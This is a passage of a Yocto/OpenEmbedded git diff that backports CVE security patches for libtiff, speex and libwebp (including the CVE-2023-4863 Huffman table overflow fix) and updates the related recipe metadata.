+-			*mp++ = 'c'; *mp = '\0';
++			if (strlen(mode) < (sizeof(mode) - 1))
++			{
++				*mp++ = 'c'; *mp = '\0';
++			}
+ 			break;
+ 		case '8':
+-			*mp++ = '8'; *mp = '\0';
++			if (strlen(mode) < (sizeof(mode)-1))
++			{
++				*mp++ = '8'; *mp = '\0';
++			}
+ 			break;
+ 		case 'x':
+ 			pageInSeq = 1;
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
new file mode 100644
index 0000000000..fc5d0ab5f4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
@@ -0,0 +1,30 @@
+From eecb0712f4c3a5b449f70c57988260a667ddbdef Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 6 Feb 2022 13:08:38 +0100
+Subject: [PATCH] TIFFFetchStripThing(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0561
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 23194ced..50ebf8ac 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5683,8 +5682,9 @@
+ 			_TIFFfree(data);
+ 			return(0);
+ 		}
+-                _TIFFmemcpy(resizeddata,data,(uint32)dir->tdir_count*sizeof(uint64));
+-                _TIFFmemset(resizeddata+(uint32)dir->tdir_count,0,(nstrips-(uint32)dir->tdir_count)*sizeof(uint64));
++               if( dir->tdir_count )
++                       _TIFFmemcpy(resizeddata,data, (uint32)dir->tdir_count * sizeof(uint64));
++               _TIFFmemset(resizeddata+(uint32)dir->tdir_count, 0, (nstrips - (uint32)dir->tdir_count) * sizeof(uint64));
+ 		_TIFFfree(data);
+ 		data=resizeddata;
+ 	}
diff --git a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
index 1f92c18513..7efaba3a38 100644
--- a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
+++ b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
@@ -1,10 +1,59 @@
 SUMMARY = "Provides support for the Tag Image File Format (TIFF)"
+DESCRIPTION = "Library provides support for the Tag Image File Format \
+(TIFF), a widely used format for storing image data.  This library \
+provide means to easily access and create TIFF image files."
+HOMEPAGE = "http://www.libtiff.org/"
 LICENSE = "BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=34da3db46fab7501992f9615d7e158cf"
 
 CVE_PRODUCT = "libtiff"
 
 SRC_URI = "http://download.osgeo.org/libtiff/tiff-${PV}.tar.gz \
+           file://CVE-2020-35523.patch  \
+           file://CVE-2020-35524-1.patch \
+           file://CVE-2020-35524-2.patch \
+           file://001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+           file://002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+           file://CVE-2020-35521_and_CVE-2020-35522.patch \
+           file://0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch \
+           file://561599c99f987dc32ae110370cfdd7df7975586b.patch \
+           file://eecb0712f4c3a5b449f70c57988260a667ddbdef.patch \
+           file://CVE-2022-0865.patch \
+           file://CVE-2022-0908.patch \
+           file://CVE-2022-0907.patch \
+           file://CVE-2022-0909.patch \
+           file://CVE-2022-0891.patch \
+           file://CVE-2022-0924.patch \
+           file://CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch \
+           file://CVE-2022-34526.patch \
+           file://CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch \
+           file://CVE-2022-1354.patch \
+           file://CVE-2022-1355.patch \
+           file://CVE-2022-3570_3598.patch \
+           file://CVE-2022-3597_3626_3627.patch \
+           file://CVE-2022-3599.patch \
+           file://CVE-2022-3970.patch \
+           file://CVE-2022-48281.patch \
+           file://CVE-2023-0795_0796_0797_0798_0799.patch \
+           file://CVE-2023-0800_0801_0802_0803_0804.patch \
+           file://CVE-2023-1916.patch \
+           file://CVE-2023-25433.patch \
+           file://CVE-2023-25434-CVE-2023-25435.patch \
+           file://CVE-2023-26965.patch \
+           file://CVE-2023-26966.patch \
+           file://CVE-2023-2908.patch \
+           file://CVE-2023-3316.patch \
+           file://CVE-2023-3576.patch \
+           file://CVE-2023-3618.patch \
+           file://CVE-2023-40745.patch \
+           file://CVE-2023-41175.patch \
+           file://CVE-2022-40090.patch \
+           file://CVE-2023-6228.patch \
+           file://CVE-2023-6277-1.patch \
+           file://CVE-2023-6277-2.patch \
+           file://CVE-2023-6277-3.patch \
+           file://CVE-2023-6277-4.patch \
+           file://CVE-2023-52356.patch \
           "
 SRC_URI[md5sum] = "2165e7aba557463acc0664e71a3ed424"
 SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d6775b8634"
@@ -12,6 +61,10 @@ SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d677
 # exclude betas
 UPSTREAM_CHECK_REGEX = "tiff-(?P<pver>\d+(\.\d+)+).tar"
 
+# Tested with check from https://security-tracker.debian.org/tracker/CVE-2015-7313
+# and 4.1.0 doesn't have the issue
+CVE_CHECK_WHITELIST += "CVE-2015-7313"
+
 inherit autotools multilib_header
 
 CACHED_CONFIGUREVARS = "ax_cv_check_gl_libgl=no"
diff --git a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
index 00ca3675ca..d603602584 100644
--- a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
+++ b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
@@ -1,5 +1,9 @@
 SUMMARY = "Library and test program for decoding MPEG-2 and MPEG-1 video streams"
-HOMEPAGE = "http://libmpeg2.sourceforge.net/"
+DESCRIPTION = "mpeg2dec is a test program for libmpeg2. It decodes \
+mpeg-1 and mpeg-2 video streams, and also includes a demultiplexer \
+for mpeg-1 and mpeg-2 program streams. The main purpose of mpeg2dec \
+is to have a simple test bed for libmpeg2."
+HOMEPAGE = "https://libmpeg2.sourceforge.io/"
 SECTION = "libs"
 LICENSE = "GPLv2+"
 LICENSE_FLAGS = "commercial"
diff --git a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
index c7f3e67022..317983edb2 100644
--- a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
+++ b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
@@ -1,4 +1,6 @@
 SUMMARY = "Sound server for Linux and Unix-like operating systems"
+DESCRIPTION = "A general purpose sound server intended to run as a middleware \
+between your applications and your hardware devices, either using ALSA or OSS."
 HOMEPAGE = "http://www.pulseaudio.org"
 AUTHOR = "Lennart Poettering"
 SECTION = "libs/multimedia"
@@ -137,11 +139,6 @@ EXTRA_OECONF_append_armeb = "${@bb.utils.contains("TUNE_FEATURES", "neon", "", "
 
 export TARGET_PFPU = "${TARGET_FPU}"
 
-# TODO: Use more fine granular version
-#OE_LT_RPATH_ALLOW=":${libdir}/pulse-0.9:"
-OE_LT_RPATH_ALLOW = "any"
-OE_LT_RPATH_ALLOW[export]="1"
-
 set_cfg_value () {
 	sed -i -e "s/\(; *\)\?$2 =.*/$2 = $3/" "$1"
 	if ! grep -q "^$2 = $3\$" "$1"; then
diff --git a/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
new file mode 100644
index 0000000000..eb16e95ffc
--- /dev/null
+++ b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
@@ -0,0 +1,30 @@
+Backport patch to fix CVE-2020-23903.
+
+CVE: CVE-2020-23903
+Upstream-Status: Backport [https://github.com/xiph/speex/commit/870ff84]
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 870ff845b32f314aec0036641ffe18aba4916887 Mon Sep 17 00:00:00 2001
+From: Tristan Matthews <tmatth@videolan.org>
+Date: Mon, 13 Jul 2020 23:25:03 -0400
+Subject: [PATCH] wav_io: guard against invalid channel numbers
+
+Fixes #13
+---
+ src/wav_io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/wav_io.c b/src/wav_io.c
+index b5183015..09d62eb0 100644
+--- a/src/wav_io.c
++++ b/src/wav_io.c
+@@ -111,7 +111,7 @@ int read_wav_header(FILE *file, int *rate, int *channels, int *format, spx_int32
+    stmp = le_short(stmp);
+    *channels = stmp;
+ 
+-   if (stmp>2)
++   if (stmp>2 || stmp<1)
+    {
+       fprintf (stderr, "Only mono and (intensity) stereo supported\n");
+       return -1;
diff --git a/meta/recipes-multimedia/speex/speex_1.2.0.bb b/meta/recipes-multimedia/speex/speex_1.2.0.bb
index 3a0911d6f8..ea475f0f1b 100644
--- a/meta/recipes-multimedia/speex/speex_1.2.0.bb
+++ b/meta/recipes-multimedia/speex/speex_1.2.0.bb
@@ -7,7 +7,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=314649d8ba9dd7045dfb6683f298d0a8 \
                     file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50"
 DEPENDS = "libogg speexdsp"
 
-SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz"
+SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz \
+           file://CVE-2020-23903.patch \
+           "
 UPSTREAM_CHECK_REGEX = "speex-(?P<pver>\d+(\.\d+)+)\.tar"
 
 SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c"
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
new file mode 100644
index 0000000000..d293ab93ab
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
@@ -0,0 +1,55 @@
+From a486d800b60d0af4cc0836bf7ed8f21e12974129 Mon Sep 17 00:00:00 2001
+From: James Zern <jzern@google.com>
+Date: Wed, 22 Feb 2023 22:15:47 -0800
+Subject: [PATCH] EncodeAlphaInternal: clear result->bw on error
+
+This avoids a double free should the function fail prior to
+VP8BitWriterInit() and a previous trial result's buffer carried over.
+Previously in ApplyFiltersAndEncode() trial.bw (with a previous
+iteration's buffer) would be freed, followed by best.bw pointing to the
+same buffer.
+
+Since:
+187d379d add a fallback to ALPHA_NO_COMPRESSION
+
+In addition, check the return value of VP8BitWriterInit() in this
+function.
+
+Bug: webp:603
+Change-Id: Ic258381ee26c8c16bc211d157c8153831c8c6910
+
+CVE: CVE-2023-1999
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/a486d800b60d0af4cc0836bf7ed8f21e12974129]
+Signed-off-by: Nikhil R <nikhil.r@kpit.com>
+---
+ src/enc/alpha_enc.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/enc/alpha_enc.c b/src/enc/alpha_enc.c
+index f7c02690e3..7d205586fe 100644
+--- a/src/enc/alpha_enc.c
++++ b/src/enc/alpha_enc.c
+@@ -13,6 +13,7 @@
+ 
+ #include <assert.h>
+ #include <stdlib.h>
++#include <string.h>
+ 
+ #include "src/enc/vp8i_enc.h"
+ #include "src/dsp/dsp.h"
+@@ -148,6 +149,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+       }
+     } else {
+       VP8LBitWriterWipeOut(&tmp_bw);
++      memset(&result->bw, 0, sizeof(result->bw));
+       return 0;
+     }
+   }
+@@ -162,7 +164,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+   header = method | (filter << 2);
+   if (reduce_levels) header |= ALPHA_PREPROCESSED_LEVELS << 4;
+ 
+-  VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size);
++  if (!VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size)) ok = 0;
+   ok = ok && VP8BitWriterAppend(&result->bw, &header, ALPHA_HEADER_LEN);
+   ok = ok && VP8BitWriterAppend(&result->bw, output, output_size);
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
new file mode 100644
index 0000000000..419b12f7d9
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
@@ -0,0 +1,366 @@
+From 902bc9190331343b2017211debcec8d2ab87e17a Mon Sep 17 00:00:00 2001
+From: Vincent Rabaud <vrabaud@google.com>
+Date: Thu, 7 Sep 2023 21:16:03 +0200
+Subject: [PATCH 1/2] Fix OOB write in BuildHuffmanTable.
+
+First, BuildHuffmanTable is called to check if the data is valid.
+If it is and the table is not big enough, more memory is allocated.
+
+This will make sure that valid (but unoptimized because of unbalanced
+codes) streams are still decodable.
+
+Bug: chromium:1479274
+Change-Id: I31c36dbf3aa78d35ecf38706b50464fd3d375741
+
+CVE: CVE-2023-4863
+
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/902bc9190331343b2017211debcec8d2ab87e17a]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/dec/vp8l_dec.c        | 46 ++++++++++---------
+ src/dec/vp8li_dec.h       |  2 +-
+ src/utils/huffman_utils.c | 97 +++++++++++++++++++++++++++++++--------
+ src/utils/huffman_utils.h | 27 +++++++++--
+ 4 files changed, 129 insertions(+), 43 deletions(-)
+
+diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
+index 93615d4..0d38314 100644
+--- a/src/dec/vp8l_dec.c
++++ b/src/dec/vp8l_dec.c
+@@ -253,11 +253,11 @@ static int ReadHuffmanCodeLengths(
+   int symbol;
+   int max_symbol;
+   int prev_code_len = DEFAULT_CODE_LENGTH;
+-  HuffmanCode table[1 << LENGTHS_TABLE_BITS];
++  HuffmanTables tables;
+ 
+-  if (!VP8LBuildHuffmanTable(table, LENGTHS_TABLE_BITS,
+-                             code_length_code_lengths,
+-                             NUM_CODE_LENGTH_CODES)) {
++  if (!VP8LHuffmanTablesAllocate(1 << LENGTHS_TABLE_BITS, &tables) ||
++      !VP8LBuildHuffmanTable(&tables, LENGTHS_TABLE_BITS,
++                             code_length_code_lengths, NUM_CODE_LENGTH_CODES)) {
+     goto End;
+   }
+ 
+@@ -277,7 +277,7 @@ static int ReadHuffmanCodeLengths(
+     int code_len;
+     if (max_symbol-- == 0) break;
+     VP8LFillBitWindow(br);
+-    p = &table[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
++    p = &tables.curr_segment->start[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
+     VP8LSetBitPos(br, br->bit_pos_ + p->bits);
+     code_len = p->value;
+     if (code_len < kCodeLengthLiterals) {
+@@ -300,6 +300,7 @@ static int ReadHuffmanCodeLengths(
+   ok = 1;
+ 
+  End:
++  VP8LHuffmanTablesDeallocate(&tables);
+   if (!ok) dec->status_ = VP8_STATUS_BITSTREAM_ERROR;
+   return ok;
+ }
+@@ -307,7 +308,8 @@ static int ReadHuffmanCodeLengths(
+ // 'code_lengths' is pre-allocated temporary buffer, used for creating Huffman
+ // tree.
+ static int ReadHuffmanCode(int alphabet_size, VP8LDecoder* const dec,
+-                           int* const code_lengths, HuffmanCode* const table) {
++                           int* const code_lengths,
++                           HuffmanTables* const table) {
+   int ok = 0;
+   int size = 0;
+   VP8LBitReader* const br = &dec->br_;
+@@ -362,8 +364,7 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+   VP8LMetadata* const hdr = &dec->hdr_;
+   uint32_t* huffman_image = NULL;
+   HTreeGroup* htree_groups = NULL;
+-  HuffmanCode* huffman_tables = NULL;
+-  HuffmanCode* huffman_table = NULL;
++  HuffmanTables* huffman_tables = &hdr->huffman_tables_;
+   int num_htree_groups = 1;
+   int num_htree_groups_max = 1;
+   int max_alphabet_size = 0;
+@@ -372,6 +373,10 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+   int* mapping = NULL;
+   int ok = 0;
+ 
++  // Check the table has been 0 initialized (through InitMetadata).
++  assert(huffman_tables->root.start == NULL);
++  assert(huffman_tables->curr_segment == NULL);
++
+   if (allow_recursion && VP8LReadBits(br, 1)) {
+     // use meta Huffman codes.
+     const int huffman_precision = VP8LReadBits(br, 3) + 2;
+@@ -434,16 +439,15 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ 
+   code_lengths = (int*)WebPSafeCalloc((uint64_t)max_alphabet_size,
+                                       sizeof(*code_lengths));
+-  huffman_tables = (HuffmanCode*)WebPSafeMalloc(num_htree_groups * table_size,
+-                                                sizeof(*huffman_tables));
+   htree_groups = VP8LHtreeGroupsNew(num_htree_groups);
+ 
+-  if (htree_groups == NULL || code_lengths == NULL || huffman_tables == NULL) {
++  if (htree_groups == NULL || code_lengths == NULL ||
++      !VP8LHuffmanTablesAllocate(num_htree_groups * table_size,
++                                 huffman_tables)) {
+     dec->status_ = VP8_STATUS_OUT_OF_MEMORY;
+     goto Error;
+   }
+ 
+-  huffman_table = huffman_tables;
+   for (i = 0; i < num_htree_groups_max; ++i) {
+     // If the index "i" is unused in the Huffman image, just make sure the
+     // coefficients are valid but do not store them.
+@@ -468,19 +472,20 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+       int max_bits = 0;
+       for (j = 0; j < HUFFMAN_CODES_PER_META_CODE; ++j) {
+         int alphabet_size = kAlphabetSize[j];
+-        htrees[j] = huffman_table;
+         if (j == 0 && color_cache_bits > 0) {
+           alphabet_size += (1 << color_cache_bits);
+         }
+-        size = ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_table);
++        size =
++            ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_tables);
++        htrees[j] = huffman_tables->curr_segment->curr_table;
+         if (size == 0) {
+           goto Error;
+         }
+         if (is_trivial_literal && kLiteralMap[j] == 1) {
+-          is_trivial_literal = (huffman_table->bits == 0);
++          is_trivial_literal = (htrees[j]->bits == 0);
+         }
+-        total_size += huffman_table->bits;
+-        huffman_table += size;
++        total_size += htrees[j]->bits;
++        huffman_tables->curr_segment->curr_table += size;
+         if (j <= ALPHA) {
+           int local_max_bits = code_lengths[0];
+           int k;
+@@ -515,14 +520,13 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+   hdr->huffman_image_ = huffman_image;
+   hdr->num_htree_groups_ = num_htree_groups;
+   hdr->htree_groups_ = htree_groups;
+-  hdr->huffman_tables_ = huffman_tables;
+ 
+  Error:
+   WebPSafeFree(code_lengths);
+   WebPSafeFree(mapping);
+   if (!ok) {
+     WebPSafeFree(huffman_image);
+-    WebPSafeFree(huffman_tables);
++    VP8LHuffmanTablesDeallocate(huffman_tables);
+     VP8LHtreeGroupsFree(htree_groups);
+   }
+   return ok;
+@@ -1354,7 +1358,7 @@ static void ClearMetadata(VP8LMetadata* const hdr) {
+   assert(hdr != NULL);
+ 
+   WebPSafeFree(hdr->huffman_image_);
+-  WebPSafeFree(hdr->huffman_tables_);
++  VP8LHuffmanTablesDeallocate(&hdr->huffman_tables_);
+   VP8LHtreeGroupsFree(hdr->htree_groups_);
+   VP8LColorCacheClear(&hdr->color_cache_);
+   VP8LColorCacheClear(&hdr->saved_color_cache_);
+@@ -1670,7 +1674,7 @@ int VP8LDecodeImage(VP8LDecoder* const dec) {
+   // Sanity checks.
+   if (dec == NULL) return 0;
+ 
+-  assert(dec->hdr_.huffman_tables_ != NULL);
++  assert(dec->hdr_.huffman_tables_.root.start != NULL);
+   assert(dec->hdr_.htree_groups_ != NULL);
+   assert(dec->hdr_.num_htree_groups_ > 0);
+ 
+diff --git a/src/dec/vp8li_dec.h b/src/dec/vp8li_dec.h
+index 72b2e86..32540a4 100644
+--- a/src/dec/vp8li_dec.h
++++ b/src/dec/vp8li_dec.h
+@@ -51,7 +51,7 @@ typedef struct {
+   uint32_t*       huffman_image_;
+   int             num_htree_groups_;
+   HTreeGroup*     htree_groups_;
+-  HuffmanCode*    huffman_tables_;
++  HuffmanTables   huffman_tables_;
+ } VP8LMetadata;
+ 
+ typedef struct VP8LDecoder VP8LDecoder;
+diff --git a/src/utils/huffman_utils.c b/src/utils/huffman_utils.c
+index 0cba0fb..9efd628 100644
+--- a/src/utils/huffman_utils.c
++++ b/src/utils/huffman_utils.c
+@@ -177,21 +177,24 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
+       if (num_open < 0) {
+         return 0;
+       }
+-      if (root_table == NULL) continue;
+       for (; count[len] > 0; --count[len]) {
+         HuffmanCode code;
+         if ((key & mask) != low) {
+-          table += table_size;
++          if (root_table != NULL) table += table_size;
+           table_bits = NextTableBitSize(count, len, root_bits);
+           table_size = 1 << table_bits;
+           total_size += table_size;
+           low = key & mask;
+-          root_table[low].bits = (uint8_t)(table_bits + root_bits);
+-          root_table[low].value = (uint16_t)((table - root_table) - low);
++          if (root_table != NULL) {
++            root_table[low].bits = (uint8_t)(table_bits + root_bits);
++            root_table[low].value = (uint16_t)((table - root_table) - low);
++          }
++        }
++        if (root_table != NULL) {
++          code.bits = (uint8_t)(len - root_bits);
++          code.value = (uint16_t)sorted[symbol++];
++          ReplicateValue(&table[key >> root_bits], step, table_size, code);
+         }
+-        code.bits = (uint8_t)(len - root_bits);
+-        code.value = (uint16_t)sorted[symbol++];
+-        ReplicateValue(&table[key >> root_bits], step, table_size, code);
+         key = GetNextKey(key, len);
+       }
+     }
+@@ -211,25 +214,83 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
+   ((1 << MAX_CACHE_BITS) + NUM_LITERAL_CODES + NUM_LENGTH_CODES)
+ // Cut-off value for switching between heap and stack allocation.
+ #define SORTED_SIZE_CUTOFF 512
+-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
++int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
+                           const int code_lengths[], int code_lengths_size) {
+-  int total_size;
++  const int total_size =
++      BuildHuffmanTable(NULL, root_bits, code_lengths, code_lengths_size, NULL);
+   assert(code_lengths_size <= MAX_CODE_LENGTHS_SIZE);
+-  if (root_table == NULL) {
+-    total_size = BuildHuffmanTable(NULL, root_bits,
+-                                   code_lengths, code_lengths_size, NULL);
+-  } else if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
++  if (total_size == 0 || root_table == NULL) return total_size;
++
++  if (root_table->curr_segment->curr_table + total_size >=
++      root_table->curr_segment->start + root_table->curr_segment->size) {
++    // If 'root_table' does not have enough memory, allocate a new segment.
++    // The available part of root_table->curr_segment is left unused because we
++    // need a contiguous buffer.
++    const int segment_size = root_table->curr_segment->size;
++    struct HuffmanTablesSegment* next =
++        (HuffmanTablesSegment*)WebPSafeMalloc(1, sizeof(*next));
++    if (next == NULL) return 0;
++    // Fill the new segment.
++    // We need at least 'total_size' but if that value is small, it is better to
++    // allocate a big chunk to prevent more allocations later. 'segment_size' is
++    // therefore chosen (any other arbitrary value could be chosen).
++    next->size = total_size > segment_size ? total_size : segment_size;
++    next->start =
++        (HuffmanCode*)WebPSafeMalloc(next->size, sizeof(*next->start));
++    if (next->start == NULL) {
++      WebPSafeFree(next);
++      return 0;
++    }
++    next->curr_table = next->start;
++    next->next = NULL;
++    // Point to the new segment.
++    root_table->curr_segment->next = next;
++    root_table->curr_segment = next;
++  }
++  if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
+     // use local stack-allocated array.
+     uint16_t sorted[SORTED_SIZE_CUTOFF];
+-    total_size = BuildHuffmanTable(root_table, root_bits,
+-                                   code_lengths, code_lengths_size, sorted);
+-  } else {   // rare case. Use heap allocation.
++    BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
++                      code_lengths, code_lengths_size, sorted);
++  } else {  // rare case. Use heap allocation.
+     uint16_t* const sorted =
+         (uint16_t*)WebPSafeMalloc(code_lengths_size, sizeof(*sorted));
+     if (sorted == NULL) return 0;
+-    total_size = BuildHuffmanTable(root_table, root_bits,
+-                                   code_lengths, code_lengths_size, sorted);
++    BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
++                      code_lengths, code_lengths_size, sorted);
+     WebPSafeFree(sorted);
+   }
+   return total_size;
+ }
++
++int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables) {
++  // Have 'segment' point to the first segment for now, 'root'.
++  HuffmanTablesSegment* const root = &huffman_tables->root;
++  huffman_tables->curr_segment = root;
++  // Allocate root.
++  root->start = (HuffmanCode*)WebPSafeMalloc(size, sizeof(*root->start));
++  if (root->start == NULL) return 0;
++  root->curr_table = root->start;
++  root->next = NULL;
++  root->size = size;
++  return 1;
++}
++
++void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables) {
++  HuffmanTablesSegment *current, *next;
++  if (huffman_tables == NULL) return;
++  // Free the root node.
++  current = &huffman_tables->root;
++  next = current->next;
++  WebPSafeFree(current->start);
++  current->start = NULL;
++  current->next = NULL;
++  current = next;
++  // Free the following nodes.
++  while (current != NULL) {
++    next = current->next;
++    WebPSafeFree(current->start);
++    WebPSafeFree(current);
++    current = next;
++  }
++}
+diff --git a/src/utils/huffman_utils.h b/src/utils/huffman_utils.h
+index 13b7ad1..98415c5 100644
+--- a/src/utils/huffman_utils.h
++++ b/src/utils/huffman_utils.h
+@@ -43,6 +43,29 @@ typedef struct {
+                     // or non-literal symbol otherwise
+ } HuffmanCode32;
+ 
++// Contiguous memory segment of HuffmanCodes.
++typedef struct HuffmanTablesSegment {
++  HuffmanCode* start;
++  // Pointer to where we are writing into the segment. Starts at 'start' and
++  // cannot go beyond 'start' + 'size'.
++  HuffmanCode* curr_table;
++  // Pointer to the next segment in the chain.
++  struct HuffmanTablesSegment* next;
++  int size;
++} HuffmanTablesSegment;
++
++// Chained memory segments of HuffmanCodes.
++typedef struct HuffmanTables {
++  HuffmanTablesSegment root;
++  // Currently processed segment. At first, this is 'root'.
++  HuffmanTablesSegment* curr_segment;
++} HuffmanTables;
++
++// Allocates a HuffmanTables with 'size' contiguous HuffmanCodes. Returns 0 on
++// memory allocation error, 1 otherwise.
++int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables);
++void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables);
++
+ #define HUFFMAN_PACKED_BITS 6
+ #define HUFFMAN_PACKED_TABLE_SIZE (1u << HUFFMAN_PACKED_BITS)
+ 
+@@ -78,9 +101,7 @@ void VP8LHtreeGroupsFree(HTreeGroup* const htree_groups);
+ // the huffman table.
+ // Returns built table size or 0 in case of error (invalid tree or
+ // memory error).
+-// If root_table is NULL, it returns 0 if a lookup cannot be built, something
+-// > 0 otherwise (but not the table size).
+-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
++int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
+                           const int code_lengths[], int code_lengths_size);
+ 
+ #ifdef __cplusplus
+-- 
+2.40.0
+
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
new file mode 100644
index 0000000000..c1eedb6100
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
@@ -0,0 +1,53 @@
+From 95ea5226c870449522240ccff26f0b006037c520 Mon Sep 17 00:00:00 2001
+From: Vincent Rabaud <vrabaud@google.com>
+Date: Mon, 11 Sep 2023 16:06:08 +0200
+Subject: [PATCH 2/2] Fix invalid incremental decoding check.
+
+The first condition is only necessary if we have not read enough
+(enough being defined by src_last, not src_end which is the end
+of the image).
+The second condition now fits the comment below: "if not
+incremental, and we are past the end of buffer".
+
+BUG=oss-fuzz:62136
+
+Change-Id: I0700f67c62db8e1c02c2e429a069a71e606a5e4f
+
+CVE: CVE-2023-4863
+
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/95ea5226c870449522240ccff26f0b006037c520]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/dec/vp8l_dec.c | 15 +++++++++++++--
+ 1 file changed, 13 insertions(+), 2 deletions(-)
+
+diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
+index 0d38314..684a5b6 100644
+--- a/src/dec/vp8l_dec.c
++++ b/src/dec/vp8l_dec.c
+@@ -1237,9 +1237,20 @@ static int DecodeImageData(VP8LDecoder* const dec, uint32_t* const data,
+   }
+
+   br->eos_ = VP8LIsEndOfStream(br);
+-  if (dec->incremental_ && br->eos_ && src < src_end) {
++  // In incremental decoding:
++  // br->eos_ && src < src_last: if 'br' reached the end of the buffer and
++  // 'src_last' has not been reached yet, there is not enough data. 'dec' has to
++  // be reset until there is more data.
++  // !br->eos_ && src < src_last: this cannot happen as either the buffer is
++  // fully read, either enough has been read to reach 'src_last'.
++  // src >= src_last: 'src_last' is reached, all is fine. 'src' can actually go
++  // beyond 'src_last' in case the image is cropped and an LZ77 goes further.
++  // The buffer might have been enough or there is some left. 'br->eos_' does
++  // not matter.
